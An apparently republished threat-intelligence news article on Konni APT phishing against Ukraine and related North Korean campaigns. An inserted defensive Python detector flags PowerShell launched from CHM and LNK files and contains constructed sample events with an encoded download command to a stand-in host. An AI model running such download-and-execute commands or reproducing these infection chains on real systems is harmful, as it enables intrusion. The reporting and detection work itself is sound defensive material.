North Korean Konni APT Targets Ukraine with Malware

By Admin · May 13, 2025
The North Korea-linked threat actor known as Konni APT has been tied to a phishing campaign aimed at government agencies in Ukraine, indicating that the actor's targeting extends beyond Russia.

Enterprise security company Proofpoint said the campaign's ultimate goal is to collect intelligence on the "trajectory of the Russian invasion."

"The group's interest in Ukraine follows [...]," Proofpoint said in a report shared with The Hacker News.

Konni APT, also known as Opal Sleet, Osmium, TA406, and Vedalia, is a cyber espionage group with a history of targeting organizations in South Korea, the U.S., and Russia. It has been operational since at least 2014.

Attacks mounted by the threat actor often involve the use of phishing emails to distribute malware called Konni RAT (aka UpDog) and to redirect recipients to credential-harvesting pages. Proofpoint, in an analysis of the threat group published in November 2021, assessed TA406 to be one of several actors publicly tracked as Kimsuky, Thallium, and Konni.

The latest set of attacks recorded by the cybersecurity company involves phishing emails impersonating a fictitious senior employee at a think tank called the Royal Institute of Strategic Studies, which is itself a non-existent organization.

The email messages contain a link to a password-protected RAR archive hosted on the MEGA cloud storage service. Opening the RAR archive with the password provided in the message triggers an infection sequence designed to conduct extensive reconnaissance of the compromised machine.


Specifically, the RAR archive contains a CHM file that displays decoy content related to former Ukrainian military commander Valerii Zaluzhnyi. When the victim clicks anywhere on the page, a PowerShell command embedded in the HTML is executed to reach out to an external server and fetch a next-stage PowerShell payload.

The newly launched PowerShell script is capable of running various commands to gather information about the system, encoding the results with Base64, and sending them to the same server.

"The actor sent multiple phishing emails on consecutive days if the target did not follow the link, asking the target whether they had received the previous emails and whether they would download the files," the researchers said.

Proofpoint said it also observed the HTML file being distributed directly as an attachment to phishing messages. In this variation of the attack, the victim is instructed to click an embedded link in the HTML file, which triggers the download of a ZIP archive containing a benign PDF and a Windows shortcut (LNK) file.

When the LNK is launched, it runs Base64-encoded PowerShell to drop a JavaScript-encoded file called "Themes.jse" by means of a Visual Basic Script. The JSE malware, in turn, reaches out to an attacker-controlled URL and runs the server's response via PowerShell. The exact nature of the payload is currently unknown.
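A defender-side illustration of the two delivery chains described above (CHM lure launching PowerShell, and LNK launching Base64-encoded PowerShell that hands off to a .jse file), added here and not part of the original article or Proofpoint's report: a small Python checker that flags the suspicious parent/child process pairs and decodes the `-EncodedCommand` argument from constructed, Sysmon-style sample events. The event shape, paths and sample command lines are assumptions made for the example.

```python
import base64
import re

def basename(path):
    """Last path component, lower-cased, so rules match regardless of install path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

# -e, -ec, -enc, -encoded, -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"-e(?:c|nc|ncoded(?:command)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_powershell_enc(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE inside base64) or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(event):
    """Return the names of the rules a single process-creation event trips."""
    parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    hits = []
    # CHM lure: the HTML Help viewer (hh.exe) has no business launching PowerShell.
    if parent == "hh.exe" and image.startswith("powershell"):
        hits.append("chm_spawns_powershell")
    # LNK variant: a double-clicked shortcut runs PowerShell directly under explorer.exe.
    if parent == "explorer.exe" and image.startswith("powershell"):
        hits.append("explorer_spawns_powershell")
    # Base64-encoded command line, used in both chains to hide the next stage.
    if image.startswith("powershell") and decode_powershell_enc(cmd) is not None:
        hits.append("encoded_powershell")
    # PowerShell handing a dropped .jse file to the Windows Script Host.
    if parent.startswith("powershell") and image in ("wscript.exe", "cscript.exe") and ".jse" in cmd.lower():
        hits.append("powershell_spawns_script_host")
    return hits

def scan(events):
    """Map event index -> rule hits for every event that tripped at least one rule."""
    return {i: analyze(e) for i, e in enumerate(events) if analyze(e)}

def _enc(ps):
    """Encode a PowerShell snippet the way -EncodedCommand expects (constructed sample data)."""
    return base64.b64encode(ps.encode("utf-16le")).decode()

# Constructed sample events in a simplified Sysmon-like shape; not real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\hh.exe", "image": PS,
     "cmdline": "powershell.exe -nop -w hidden -enc " + _enc("Invoke-WebRequest http://stage2.invalid/next.ps1")},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell.exe -w hidden -EncodedCommand " + _enc("wscript Themes.jse")},
    {"parent": PS, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\user\AppData\Local\Temp\Themes.jse"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(i, hits, decode_powershell_enc(SAMPLE_EVENTS[i]["cmdline"]))
```

Decoding the encoded argument matters because the Base64 blob hides the download cradle from simple string matching; the decoded text is what an analyst should review and pivot on.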

In addition, TA406 has been observed attempting to harvest credentials by sending fake Microsoft security alerts to Ukrainian government entities from ProtonMail accounts, warning them of suspicious sign-in activity from IP addresses located in the U.S. and urging them to verify the login by visiting a link.

The same compromised domain is said to have been used in the past to harvest Naver login information.

"These credential-harvesting attempts took place before the attempts to deploy malware and targeted some of the same users later targeted by the HTML delivery campaign," Proofpoint said. "TA406 is probably gathering intelligence to help the North Korean leadership determine the current risk to its forces already in the theater, as well as the likelihood that Russia will ask for more troops and weapons."

"Unlike Russian groups, which were probably tasked with gathering tactical battlefield information and targeting Ukrainian forces in situ, TA406 has typically focused on more strategic, political collection efforts."

The disclosure comes as the Konni group has also been linked to a complex multi-stage malware campaign targeting South Korean organizations with ZIP archives containing LNK files that launch PowerShell scripts to retrieve a CAB archive and ultimately deliver a batch script for malware capable of collecting sensitive data and exfiltrating it to a remote server.

The findings also coincide with a spear-phishing campaign orchestrated by Kimsuky targeting government bodies in South Korea, delivering information-stealing malware capable of establishing command-and-control (C2 or C&C) communications and exfiltrating files, data, and cryptocurrency wallet information.

According to the South Korean cybersecurity company AhnLab, Kimsuky is also distributing PebbleDash within a multi-stage infection sequence initiated via spear-phishing. The trojan was attributed by the U.S. government to the Lazarus Group in May 2020.

"While the Kimsuky group uses different types of malware, in the case of PebbleDash they execute malicious programs [...]," AhnLab noted.


"They then use a PowerShell script to create a scheduled task and register it for automatic execution. Using a Dropbox C&C channel and a TCP socket server, the group installs several pieces of malware and tools, including PebbleDash."

Konni and Kimsuky are far from the only North Korean threat actors focused on Seoul. Most recently, in March 2025, South Korean entities were found to be on the receiving end of another campaign carried out by APT37, which is also called ScarCruft.

The spear-phishing attacks, codenamed "Toybox Story," singled out several activists focused on North Korea, according to the Genians Security Center (GSC). The first observed spear-phishing attack took place on March 8, 2025.

"The email contained a Dropbox link that led to a compressed archive that included a malicious shortcut (LNK) file," the South Korean company noted. "When extracted and executed, the LNK file activated additional malware containing the keyword 'toy'."

The LNK files are configured to open an HWP decoy file and launch PowerShell commands, which lead to files named toy03.bat, Toy02.bat, and Toy01.bat (in that order), the last of which contains shellcode to launch RoKRAT, a malware family associated with APT37.

RoKRAT is equipped to collect system information, capture screenshots, and use three different cloud services, including pCloud, Yandex, and Dropbox, for C2.

"The threat actors abused legitimate cloud services as C2 infrastructure and continuously modified shortcut (LNK) files, focusing on fileless attack methods to evade detection by antivirus software installed on the target endpoints," Genians said.
